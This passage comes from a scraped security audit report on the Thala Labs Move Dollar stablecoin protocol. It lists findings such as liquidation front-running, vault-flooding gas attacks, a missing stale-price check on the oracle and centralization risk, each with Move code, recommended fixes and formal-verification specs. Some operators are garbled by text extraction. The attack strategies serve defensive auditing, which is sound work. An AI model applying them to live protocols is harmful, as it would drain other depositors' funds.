", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Riskless liquidation rewards in stability_pool", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: High Severity: High Impact: Critical The profits for stability pool depositors are initially increasing as the price of collateral assets relative to APD decreases. Profits continue to increase until they reach their maximum, after which they begin to decrease and eventually become losses. The intercepts for profit and loss and the location of peak profit depend on system parameters. However, in general there is an optimal liquidation price at which maximum profit is realized for the liquidation. Below this price, profits are decreasing until they eventually cross a critical threshold and turn into losses. Because APD depositors are able to freely deposit and withdraw funds from the stability pool, the incentive mechanism above creates free optionality for APD depositors. For example, a clever depositor can avoid losses in all cases by 1. Calling liquidate themselves when it optimizes the profit of the stability pool. 2. Front-running liquidation events that would result in losses by withdrawing APD prior to the liquidation call. Furthermore, there are no economic incentives for anyone who is not a stability pool depositor to call vault::liquidate. A malicious actor who follows this strategy can effectively rob other APD depositors of their compensation. It is likely that word of this exploit would spread, resulting in other APD depositors following this strategy or, when unable to do so, removing their deposits from the protocol. This would effectively break a critical mechanism of the design and the integrity of the stablecoin. We recommend the following changes in order to remove the attack vector: 1. Add timelocks for depositors. 2. Provide incentives for those who are not stability pool depositors to call vault::liquidate. It is important to note, however, that the proper functioning of the stablecoin protocol requires that APD depositors have timely access to their funds. For example, it may be necessary to support other mechanisms in the protocol, such as calls to vault::redeem_collateral. Careful consideration should be made in determining the appropriate length of time for timelocks. It may even be advisable to actively manage the length of timelocks in response to market conditions. Thala Labs has incorporated a mitigation for this issue by enforcing a minimum deposit time with a linear fee. Due to extensive changes in the project, a separate review would be required to confirm its correctness. To further discourage liquidity providers from front-running negative events to leave the pool, we encourage Thala Labs to consider adding a short delay for all withdrawals, even those by depositors who have spent significant time in the pool.", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Redemption mechanism allows undercollateralized vaults to escape liquidation penalization", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: High Severity: High Impact: Critical Undercollateralized vaults can have their debt paid off without incurring liquidation penalties when users make calls to vault::redeem_collateral.
The amount of debt paid off in a given vault during a call to liquidation is given by the following: let redeemed_usd = fixed_point::min( fixed_point::min(collateral_usd, debt_usd), fixed_point::from_u64(coin::value(&remained_debt_coin)), ); In the event that collateral_usd < debt_usd and collateral_usd < remained_debt_coin hold prior to the call to repay_internal, and remained_debt_coin > 0 holds after the call to repay_internal, repay_internal(redeemee, coin::extract(&mut remained_debt_coin, redeemed_debt)); the full collateral of the vault will be removed and an amount of debt equal to the collateral amount will be paid. However, the vault will hold a debt equal to debt_usd - collateral_usd. Additionally, the vault with zero collateral and nonzero debt will be reinserted into the sorted vaults: // update sorted_vaults if (coin::value(&remained_debt_coin) != 0) { // all debt repayed, so should be inserted as head sorted_vaults::reinsert( redeemee, math::compute_nominal_cr(0, 0), option::none(), sorted_vaults::get_first(), ); } else { The ability for undercollateralized positions to be exited without paying penalties to the stability pool disincentivizes users from supporting the stability of the protocol by depositing APD into the stability pool. Furthermore, it creates a way for undercollateralized vaults to redeem their collateral without incurring any penalty. Vaults with zero collateral and nonzero debt should not exist in the system at all, let alone in the head of the SortedVaults, where it is assumed that positions have nonzero debt. Furthermore, this APD would effectively be locked out from burning and would result in outstanding APD that is not backed by collateral. While this might not immediately break the protocol, these unbacked APD positions could accumulate over time. Given one of the aims of the protocol is to ensure that all APD is not only backed by collateral but is overcollateralized, this could result in loss of confidence in the protocol. The situation can be avoided if undercollateralized vaults cannot be redeemed but can only be liquidated. An undercollateralization check should be included in the logic for vault::redeem_collateral. Thala should consider auto-liquidating these vaults when they are encountered during calls to vault::redeem_collateral. Thala Labs has implemented a fix in commit 9ac67d7c that skips redemption when vaults are undercollateralized. This mitigation addresses the issue pointed out, but its interactions with other significant protocol changes would require a separate review.
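Numerically, the redemption path described above behaves like this toy model (Python, illustrative only): redeeming against a vault whose collateral value is below its debt strips all collateral and leaves the shortfall behind as unbacked debt.

# Toy Python model of the failure mode (illustrative; real code is Move).

def redeem_against_vault(collateral_usd: int, debt_usd: int, incoming_apd: int):
    redeemed = min(collateral_usd, debt_usd, incoming_apd)  # mirrors the nested min above
    collateral_after = collateral_usd - redeemed  # collateral handed to the redeemer
    debt_after = debt_usd - redeemed              # debt burned 1:1 with redemption
    return collateral_after, debt_after

# Vault holds $80 of collateral against $100 of debt; a redeemer brings 120 APD:
assert redeem_against_vault(80, 100, 120) == (0, 20)  # zero collateral, 20 unbacked debt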
", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Public access to register_collateral can lock out collateral CoinTypes from APD", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: High Severity: High Impact: High The function stability_pool::register_collateral is public when it should be public(friend): public entry fun register_collateral(account: &signer) { assert!(signer::address_of(account) == @thala_protocol_v1, ERR_UNAUTHORIZED); assert!(initialized(), ERR_UNINITIALIZED); if (!exists<DistributedCollateral>(@thala_protocol_v1)) { let collateral = coin::zero(); let shares = table::new(); move_to(account, DistributedCollateral { collateral, shares }); } } A malicious actor can call register_collateral for any CoinType prior to this function being called from its intended control flow via an internal function call made by vault::initialize. The assertion checks in vault::initialize: public entry fun initialize(manager: &signer) { assert!(signer::address_of(manager) == @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager::initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists<CollateralState>(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); stability_pool::register_collateral(manager); sorted_vaults::initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } This will prevent the protocol manager from being able to initialize vaults for the given CoinType. In the worst case scenario, it would be possible for an attacker to completely prevent the deployment of vaults for any CoinType. Modify the access to stability_pool::register_collateral from public to public(friend). Thala Labs has followed our recommendation and changed stability_pool::register_collateral from public to public(friend) in commit fdba1010.", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Partially filled APD redemptions always charge the full redemption fees", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: High Severity: Medium Impact: Medium Partially filled APD redemptions always charge the full redemption fee, even if some of the APD passed in the function call is not redeemed: public fun redeem_collateral( debt: Coin, // TODO - take hints from the off-chain // prev: Option<address>, // next: Option<address>, ): (Coin, Coin) acquires VaultStore, CollateralState { let remained_debt_coin = debt; let redeemed_collateral_coin = coin::zero(); let redemption_fee_amount = { let redemption_fee = get_redemption_fee(); let remained_debt_amount = fixed_point::from_u64(coin::value(&remained_debt_coin)); fixed_point::to_u64(fixed_point::mul(remained_debt_amount, redemption_fee)) }; let redemption_fee_coin = coin::extract(&mut remained_debt_coin, redemption_fee_amount); manager::charge_redemption_fee(redemption_fee_coin); Because the variable redemption_fee_coin is not adjusted to account for partial redemptions, users who call vault::redeem_collateral are always charged the full redemption fee. This could discourage users from calling vault::redeem_collateral and potentially alter the economics of interacting with the protocol to the point where users seek alternative stablecoin protocols. Calculate redemption_fee_coin at the end of vault::redeem_collateral based on the actual amount of APD redeemed. Thala Labs updated the function in commit 6de6e464 to charge the correct fee for redemption. Since other architectural changes have affected the function as well, additional review would be required to confirm the correctness of redemption mechanics.", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Distribution mechanism for liquidation rewards susceptible to max_gas", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: Medium Severity: Medium Impact: Medium On the liquidation of undercollateralized vaults, control is passed from vault::liquidate to stability_pool::distribute_collateral_and_request_apd. This function uses a while loop to iterate over all of the addresses in an iterable table: struct StabilityPool has key { apd: Coin, deposits: IterableTable, num_depositors: u64, } ... public(friend) fun distribute_collateral_and_request_apd( vault_addr: address, requested_apd: u64, collateral: Coin ): Coin acquires StabilityPool, StabilityPoolEvents, DistributedCollateral { ... let depositor_iter_option = iterable_table::head_key(stability_pool_deposits); while (option::is_some(&depositor_iter_option)) { let depositor = *option::borrow(&depositor_iter_option); ... As the number of APD depositors grows, the gas costs of liquidation will steadily increase. Additionally, a malicious attacker could flood the StabilityPool.deposits iterable table with accounts with zero APD deposited. This could eventually lead to max_gas and the inability for stability pool depositors to be rewarded for risks taken in supporting the stability pool. We suggest Thala Labs adopt the reward distribution mechanism central to the ERC 4626 token vault standard. Rather than looping over depositors when allocating rewards, it increments the redemption value of shares held by all depositors to reflect increases in claimable rewards. Thala Labs has overhauled the reward system and adopted a pull-based approach for distributions. These changes can be seen in commit 513f0736. Conceptually, this is a move in the right direction; however, verifying the security of these changes would require a separate review.
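For reference, the suggested accumulator pattern can be sketched as follows (Python, illustrative; inspired by ERC-4626-style share accounting rather than taken from the Thala codebase): distribution is O(1) because it touches a single global accumulator, and each depositor's claim is derived from their shares on withdrawal.

# Illustrative Python sketch of O(1) pull-based distribution (4626-style
# share accounting; not the Thala implementation).

PRECISION = 10**12

class RewardPool:
    def __init__(self):
        self.total_shares = 0
        self.acc_per_share = 0              # reward per share, scaled by PRECISION
        self.shares: dict[str, int] = {}
        self.reward_debt: dict[str, int] = {}

    def deposit(self, who: str, amount: int) -> None:
        self.shares[who] = self.shares.get(who, 0) + amount
        self.total_shares += amount
        self.reward_debt[who] = self.reward_debt.get(who, 0) + amount * self.acc_per_share

    def distribute(self, reward: int) -> None:
        # O(1): one accumulator update, no loop over depositors.
        self.acc_per_share += reward * PRECISION // self.total_shares

    def pending(self, who: str) -> int:
        return (self.shares[who] * self.acc_per_share - self.reward_debt[who]) // PRECISION

pool = RewardPool()
pool.deposit('a', 100)
pool.deposit('b', 300)
pool.distribute(40)
assert pool.pending('a') == 10 and pool.pending('b') == 30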
3.7 Low collateral positions can lead to max_gas Target: vault Category: Business Logic Likelihood: Medium Severity: Medium : Medium The vault::open_vault function described previously enforces minimum collateralization rates but not minimum collateral. The implementation of sorted_vaults maintains a list of vaults ordered by decreasing collateralization rate. The redeem_collateral function in vault.move iterates from the sorted list’s tail to extract collateral for APD; this can be expensive. Consider this excerpt from its implementation: while (option::is_some(&min_cr_address) && coin::value(&remained_debt_coin) > 0) { let redeemee = *option::borrow(&min_cr_address); // [...] min_cr_address = sorted_vaults::get_prev(redeemee); // update sorted_vaults if (coin::value(&remained_debt_coin) != 0) { // all debt repayed, so should be inserted as head sorted_vaults::reinsert( redeemee, math::compute_nominal_cr(0, 0), option::none(), sorted_vaults::get_first(), ); } else { let (vault_collateral, vault_debt) = collateral_and_debt_amount(redeemee); // not all debt repayed, so should be reinserted with hint sorted_vaults::reinsert( redeemee, math::compute_nominal_cr((vault_collateral as u128), (vault_debt as u128)), option::none(), // TODO - should be prev option::none(), // TODO - should be next ); } }; Essentially, this begins at the vault with the lowest collateralization rate and iterates towards the head. It extracts collateral from positions until all the given APD is exchanged. Each iteration reinserts the empty vault at the head, with the last requiring a traversal to find an insertion position. Because traversal begins at the end of the sorted vaults and continues until collateral is fully redeemed, an abundance of low-collateral vaults at the list’s tail will make redeem_collateral more expensive in gas. An attacker could open many vaults with low collateral, setting the borrow amount to barely reach the minimum collateralization rate. These low-collateral positions would be placed near the end of the sorted vaults where collateral redemption begins. This would increase gas costs and could lead to max_gas in vault::redeem_collateral, affecting the ability of users to exchange APD for collateral. We recommend that vault::open_vault enforce a minimum collateral requirement. This would significantly lessen the impact of flooding the sorted vaults, as the redemption of collateral would require fewer positions. Thala Labs has added logic to prevent the system from being flooded with zero- or low-collateral vaults. The additional checks can be found in commit 6de6e464. However, fully verifying the correctness would require a separate review of the extensive architectural changes.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.8 Accumulation of vaults can lead to max_gas via insertion algorithm", "labels": [ "Zellic" ], "body": "Target: vault Category: Business Logic Likelihood: Medium Severity: Medium : Medium There are no controls preventing the creation of vaults with zero collateral in the call to vault::open_vault. Additionally, there are no processes in place to remove vaults with zero collateral. The complete liquidation of all collateral in a vault does not result in a function call to vault::close_vault. Furthermore, the current implementation of vault::close_vault does not actually remove the vault from the SortedVaults data structure. The insertion and reinsertion algorithm of sorted_vaults uses the nominal collateralization ratio to determine the order placement of vaults inserted and reinserted into the SortedVaults data structure. In the current implementation, vaults with zero collateral (and hence zero debt) are placed at the front of the linked list. public fun compute_nominal_cr(collateral: u128, debt: u128): u128 { if (debt > 0) { (collateral * NICR_PRECISION / debt) } else { // Return the maximal value for u128 if the Trove has a debt of 0. Represents "infinite" CR.
MAX_U128 } } In the current implementation, there are in general no hints provided for the insertion and reinsertion of vaults, whether they have zero or nonzero collateral or not. In the majority of cases, insertion or reinsertion requires traversing the linked list from the head until the placement determined by the rank order of the nominal collateralization ratio is found. Uncontrolled size of the linked list can result in increasing gas costs for interacting with the protocol and ultimately its failure due to max_gas. There are two separate vectors contributing to reaching max_gas: 1. A malicious attacker can flood the system with zero-collateral vaults using calls to vault::open_vault. 2. Depending on the number of users in the protocol, its regular operation will result in the steady increase of zero-collateral vaults that are never removed either by calls to vault::close_vault or vault::liquidate. A combination of the above is the most likely avenue to reaching max_gas. There are several recommendations that should be followed in order to address the issue: 1. Ensure that vaults cannot be opened with zero collateral. Furthermore, it may be beneficial to enforce a minimum collateral amount in order to open a vault to reduce the economic feasibility of the attack mentioned above. 2. Ensure that calls to vault::close_vault result in removal of the vault from SortedVaults. 3. Ensure that the complete liquidation of vaults results in calls to the updated version of vault::close_vault. 4. Provide hints to the insertion and reinsertion algorithm to avoid traversing the linked list from the head when it is not necessary. Thala Labs has added checks to ensure that zero-collateral vaults cannot be created. Specifically, in commit 6de6e464, vault creation is enforced against a minimum debt requirement. Fully validating these checks would require a separate review of new data structures and how they interact with the rest of the protocol.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.9 Unable to unregister collateral CoinTypes", "labels": [ "Zellic" ], "body": "Target: stability_pool Category: Business Logic Likelihood: Medium Severity: Medium : Medium There is currently no way to unregister collateral assets from the protocol. Furthermore, there is no mechanism to disincentivize borrowing against collateral assets that no longer meet Thala’s risk framework. During the evolution of the protocol, it is likely that some of the assets that were initially deemed suitable for inclusion in the APD stablecoin protocol no longer satisfy these conditions. For example, the volatility of collateral assets is in no way guaranteed to remain within a range acceptable to the framework. In the event one of the collateral assets becomes too volatile, there would be no way to remove it from the system. Because the stability pool supports all collateral CoinTypes, the inability to remove or discourage the use of the volatile assets could disincentivize APD depositors from supporting the stability pool. For example, it could increase the perceived likelihood of liquidation events that result in losses for stability pool depositors. Thala Labs has identified the need for appropriate mechanisms to disincentivize the use of such collateral assets. The proposal references interest rates for debt borrowers.
We recommend Thala Labs flesh out these mechanisms so that they can be reviewed. Among the considerable architectural changes that Thala Labs has made, one has been the incorporation of capabilities like asset freezing into the protocol. This functionality is present in commit 6de6e464. The update does address our concern, but the code changes are very extensive. Verifying its security and functionality would require a separate review.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.10 Missing oracle stale price check", "labels": [ "Zellic" ], "body": "Target: vault Category: Business Logic Likelihood: Medium Severity: Medium : Medium The oracle does not keep a time stamp, and there is no infrastructure in place to check for stale prices. struct PriceStore has key { numerator: u64, denominator: u64, } Even if there is a rigorous oracle-updating mechanism, stale price checks can prevent catastrophic outcomes in the event the oracle has issues. During volatile markets or rapid price movements, the true market price could easily deviate from the price in the PriceStore. Allowing users to interact with the protocol using stale prices opens up the avenue for a multitude of exploits given the large number of ways users can interact with the protocol. For example, they could avoid liquidation events, redeem collateral at favorable prices, borrow excess APD, and so forth. Expand the oracle PriceStore to include time stamps reflecting calls made to oracle::set_price by the oracle_manager. Additionally, calls made to oracle::price_of by get_oracle_price should check time stamps against the current time to evaluate whether prices are stale or not. We suggest the protocol managers incorporate a combination of statistical price analysis and market expectations to determine the appropriate time window since the last oracle update. It may also be advisable to incorporate some flexibility into the time window — for example, it is possible for prices to become increasingly stale during volatile markets with rapid price movements. We further suggest that Thala Labs make available the processes for updating their price oracle so that we can assess its robustness. Thala Labs has made commendable efforts to mitigate issues due to stale oracle prices: for instance, the project now uses a tiered oracle system that considers factors like staleness. However, the oracle framework has been expanded considerably and would require a separate review to ensure the issue has been fixed. The new oracle system exists in commit 6de6e464.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.11 Centralization risk", "labels": [ "Zellic" ], "body": "Target: Project Wide Category: Centralization Risk Likelihood: Medium Severity: Medium : Medium There are several mechanisms through which the operators of the protocol can influence the protocol in material ways. Protocol managers can exert control over the following critical operations: 1. Control over the minimum collateralization ratio (MCR) and redemption fees. 2. Vault initialization and collateral CoinTypes used in the protocol. 3. Control over the price oracle. In the most severe cases, control over the aforementioned mechanisms can lead to the following outcomes.
Calls to params::set_params can be used to reduce the value of the MCR such that certain vaults become immediately eligible for liquidation. With their knowledge of the profit and loss awarded to liquidators, a malicious actor with management access could set the MCR such that a subsequent vault liquidation would maximize profit. They could combine this with a flash loan to take over the majority of the liquidation rewards and effectively rug the protocol. Additionally, calls to params::set_params can be used to set redemption fees to excessively high values. Calls to vault::initialize can be used to register assets that do not meet the criteria of Thala Labs’s risk framework. Because all vaults are supported by one stability pool, this could severely disrupt the economics and incentives for other users to use the system. Lastly, the manager can effectively take over the oracle to set prices as they please. When done maliciously, this could severely disrupt the operation of the protocol in all manners of mechanism. While it is critical for protocol managers to be able to exert control over the parameters and variables mentioned above, this access should be controlled through a multi-signature wallet. In particular, changes to the MCR on existing pools, if made at all, should be done in combination with announcements so that users have ample time to modify their collateralization ratios and avoid liquidation. Most projects utilize multi-signature wallets to mitigate centralization risks and provide an additional layer of security. However, there are no security benefits if access control is not implemented correctly. The keys of a multi-signature wallet should always be stored independently of each other, on physically separate hardware. Should one of the systems be compromised, the damage will be isolated. Make use of hardware wallets if possible. Also consider trusted, industry-standard key custody providers. Thala Labs has indicated that a multi-signature wallet (MSafe) will be used to manage centralization risk. However, in the current implementation, it is possible for any address to be used as the manager account. One possible solution would be to check that the manager account has the MSafe resource. Additional checks could potentially be included to verify that the wallet satisfies some requirements for quorum and threshold.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.12 Missing assertion checks for critical protocol parameters", "labels": [ "Zellic" ], "body": "Target: vault Category: Business Logic Likelihood: Low Severity: Low : Low There are no checks in place to enforce that params::set_params has been called for a given CoinType prior to calling vault::initialize: public entry fun initialize(manager: &signer) { assert!(signer::address_of(manager) == @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager::initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists<CollateralState>(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); stability_pool::register_collateral(manager); sorted_vaults::initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } If the ParamStore has not been initialized via a call to params::set_params<CoinType>, subsequent calls to vault functions will fail with unclear error messages.
Force the parameters to be set up prior to allowing calls to vault::initialize by including the following assertion check: public entry fun initialize(manager: &signer) { assert!(signer::address_of(manager) == @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager::initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists<CollateralState>(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); assert!(exists<ParamStore>(@thala_protocol_v1), ERR_UNINITIALIZED_PARAMSTORE); stability_pool::register_collateral(manager); sorted_vaults::initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } Thala Labs has made extensive changes to the initialization sequence, which would require a separate review to confirm that all protocol parameters are set prior to or during the initialization. These changes are present in commit 6de6e464.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.13 Missing validation checks in set_params", "labels": [ "Zellic" ], "body": "Target: manager Category: Business Logic Likelihood: Low Severity: Low : Low Currently there are no validation checks in params::set_params to ensure that the following critical protocol parameters are not set to values that break the protocol. public entry fun set_params( manager: &signer, mcr_numerator: u64, mcr_denominator: u64, redeem_fee_numerator: u64, redeem_fee_denominator: u64, ) acquires ParamStore { assert!( signer::address_of(manager) == @thala_protocol_v1, error::invalid_argument(ERR_MANAGER_ADDRESS_MISMATCH), ); if (!exists<ParamStore>(@thala_protocol_v1)) { move_to(manager, ParamStore { mcr_numerator, mcr_denominator, redeem_fee_numerator, redeem_fee_denominator, }); } else { let param_store = borrow_global_mut<ParamStore>(@thala_protocol_v1); param_store.mcr_numerator = mcr_numerator; param_store.mcr_denominator = mcr_denominator; param_store.redeem_fee_numerator = redeem_fee_numerator; param_store.redeem_fee_denominator = redeem_fee_denominator; } } The rest of the protocol ultimately makes calls to params::mcr_of and params::redeem_fee_of under the assumption that the MCR numerator is greater than the denominator and that the redeem fee numerator is less than the denominator. Because there are no checks on their end, this is likely to result in a combination of failures and, worse, potentially erroneous calculations.
Include the following validation checks to ensure the numerators and denominators satisfy these assumptions: public entry fun set_params( manager: &signer, mcr_numerator: u64, mcr_denominator: u64, redeem_fee_numerator: u64, redeem_fee_denominator: u64, ) acquires ParamStore { assert!( signer::address_of(manager) == @thala_protocol_v1, error::invalid_argument(ERR_MANAGER_ADDRESS_MISMATCH), ); assert!( (mcr_numerator >= mcr_denominator), error::invalid_argument(ERR_MCR_NUMR_LT_DENOM), ); assert!( (redeem_fee_numerator <= redeem_fee_denominator), error::invalid_argument(ERR_FEE_NUMR_GT_DENOM), ); if (!exists<ParamStore>(@thala_protocol_v1)) { move_to(manager, ParamStore { mcr_numerator, mcr_denominator, redeem_fee_numerator, redeem_fee_denominator, }); } else { let param_store = borrow_global_mut<ParamStore>(@thala_protocol_v1); param_store.mcr_numerator = mcr_numerator; param_store.mcr_denominator = mcr_denominator; param_store.redeem_fee_numerator = redeem_fee_numerator; param_store.redeem_fee_denominator = redeem_fee_denominator; } } The initialization changed considerably by commit 6de6e464. Confirming that all the assertions are secure would require a separate review. We note that the new sequence now sets vault parameters to default values; however, they can be later modified with setter functions, which each need to be reviewed for proper checks. Additionally, the setter functions allow the minimum collateralization ratios to be changed after a vault has been deployed, which could introduce a centralization risk where a protocol owner causes open vaults to be liquidated.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.14 Locked redemption fees", "labels": [ "Zellic" ], "body": "Target: manager Category: Business Logic Likelihood: High Severity: Low : Low Currently there is no way for the manager to retrieve fees stored in the FeeStore from the calls made to manager::charge_redemption_fee in vault::redeem_collateral. The owners of the protocol would be unable to retrieve redemption fees from the FeeStore. Add an access-controlled method to the manager to allow the protocol owners to retrieve redemption fees. Thala Labs has made considerable efforts to include the functionality to allow collateral withdrawals. In commit 6de6e464, the module thala_protocol_v1::fees was fleshed out with the withdrawal functionality. However, the changes are extensive and require a separate review.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.15 The ascending insertion search fails to return the tail", "labels": [ "Zellic" ], "body": "Target: sorted_vaults Category: Business Logic Severity: Low Likelihood: Low : Low The sorted_vaults::find_insert_position_ascending search algorithm fails to return the tail position: fun find_insert_position_ascending( nominal_cr: u128, start_id: Option<address>, ): (Option<address>, Option<address>) acquires SortedVaults { if (empty()) { return (option::none(), option::none()) }; // check if the insert position is after the tail let tail = get_last(); if (option::is_none(&start_id)) { let tail_nominal_cr = get_nominal_cr(*option::borrow(&tail)); if (tail_nominal_cr >= nominal_cr) { return (option::none(), tail) } }; ... The position returned by sorted_vaults::find_insert_position_ascending does not correspond with a valid insertion position. Fortunately, however, in the current implementation this never happens because find_insert_position_ascending is never passed a start_id that is none. We strongly advise that this coding mistake be fixed. If future iterations extend the current codebase and make calls to this function by passing a start_id that is none, it could have material implications for the protocol. Thala Labs has made extensive changes to the sorted vaults implementation. The function containing this bug was removed by commit 6de6e464. It appears as though the issue has been resolved, but complete verification of the new mechanics would require a separate review.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "3.16 Instances of none in VaultStore.vault", "labels": [ "Zellic" ], "body": "Target: vault Category: Business Logic Likelihood: Low Severity: Low : Low Calls to vault::close_vault leave the vault store with a none vault: // clear resource let vault_store = borrow_global_mut<VaultStore>(account_addr); vault_store.vault = option::none(); withdrawn_collateral Closing a vault can cause the following getters to fail with an unclear error message: public fun max_borrow_amount(addr: address): u64 acquires VaultStore { assert_vault_store(addr); let vault_store = borrow_global<VaultStore>(addr); let vault = option::borrow(&vault_store.vault); max_borrow_amount_given_collateral(vault.collateral) } public fun collateral_amount(addr: address): u64 acquires VaultStore { assert_vault_store(addr); let vault_store = borrow_global<VaultStore>(addr); let vault = option::borrow(&vault_store.vault); (vault.collateral) } public fun debt_amount(addr: address): u64 acquires VaultStore { assert_vault_store(addr); let vault_store = borrow_global<VaultStore>(addr); let vault = option::borrow(&vault_store.vault); (vault.debt) } Closed vaults, and hence vault stores with none vaults, remain in the SortedVaults struct. It appears as though this should not cause an issue in the current implementation. It is strongly advised that Thala Labs avoid having fields with none values as this can lead to unexpected failures with unclear error messages. Consider removing VaultStores with none vaults from the SortedVaults struct. Alternatively, remove the VaultStore for closed vaults entirely. Additionally, include assertion checks for vaults that are not none in the above functions. In commit 6de6e464, Thala Labs added a check to ensure that no vaults with zero collateral are added to the system. However, verifying that subsequent withdrawals cannot leave empty vaults in the system requires a separate review of architectural changes.
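As a hedged sketch of the suggested assertion (the helper name and error code are hypothetical, and we assume the existing VaultStore layout), each getter could first verify that the vault is not none before borrowing it:

fun assert_vault_not_none(addr: address) acquires VaultStore {
    let vault_store = borrow_global<VaultStore>(addr);
    // Abort with a descriptive error instead of failing inside option::borrow.
    assert!(option::is_some(&vault_store.vault), ERR_VAULT_CLOSED);
}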
Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.17 Missing assertion checks for oracle initialization", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: Low Severity: Low : Low There are no checks in place to enforce that oracle:)set_price has been called for a given CoinType prior to calling vault:)initialize: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } If the PriceStore has not been initialized via a call to oracle:)set_price, calls to vault functions will fail with unclear error messages. Force the oracle to be set up prior to allowing calls to vault:)initialize by including the following assertion check: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); Zellic Thala Labs assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); assert!(!exists)(@thala_protocol_v1), ERR_UNINITIALIZED_PRICESTORE); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } Thala Labs added checks in commit 853c1f03 to ensure that the oracle is initialized be- fore vault initialization. However, verifying that these checks are secure would require a separate review of extensive changes to both the oracle and the new initialization sequence. Zellic Thala Labs 4 Formal Verification The Move language is developed alongside the Move specification language, which allows for formal specifications to be written and verified by the Move prover. The project did not include any such specifications, so we provided Thala Labs with some ourselves. Writing specifications against this project has a number of obstacles. First, the depen- dencies were fairly out of date, which presented problems for verification. Specifi- cally, the version of the Aptos framework used was incompatible with the current state of the prover, so running the tool required an upgrade. Additionally, the U256 module uses bitwise operators, which are unsupported by the Move prover. In older versions, this module would prevent the prover from being run at all; it now includes specifications that mark problematic functions as opaque. This issue with bitwise operators presented another challenge. The source of this protocol also utilized bitwise operators in a number of places. For instance, ///)) returns a to the power of b. public fun exp(a: u64, b: u8): u64 { let c = 1; while (b > 0) { if (b & 1 > 0) c = c * a; b = b >) 1; a = a * a; }; c } We recommend that Thala Labs use the modulo operator over & 1 in this and other instances. Finally, the state of the prover and the Aptos framework are not quite robust; they are not without bugs. In order to let the prover run on stability_pool.move, it is nec- essary to make minor changes to framework specifications. Additionally, the prover will not work on vault.move or sorted_vaults.move at all, as it consumes far too much memory. 
Despite these challenges, the prover still presents a powerful way to verify the behavior of certain functions. The following is a sample of some specifications we have provided; we strongly recommend that the Thala Labs team add more as well. 4.1 thala_protocol_v1::apd_coin This module is fairly simple. Here is a basic specification that checks the behavior of mint: spec mint { /// Only aborts if uninitialized. aborts_if !has_capabilities(); /// Minted value must equal amount. ensures result.value == amount; } For this module, we provided specifications for all functions: initialization, mint, burn, and initialized.", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "4.2 thala_protocol_v1::oracle", "labels": [ "Zellic" ], "body": "4.2 thala_protocol_v1::oracle The oracle module is also straightforward to prove. We can show that each of its functions performs necessary checks and changes prices correctly. spec fun has_store(): bool { exists<PriceStore>(@thala_protocol_v1) } spec fun get_store(): PriceStore { global<PriceStore>(@thala_protocol_v1) } spec set_price { /// Can only be called by @thala_protocol_v1. aborts_if signer::address_of(oracle_manager) != @thala_protocol_v1; /// Even if the resource did not exist before, it should exist after. ensures has_store(); /// 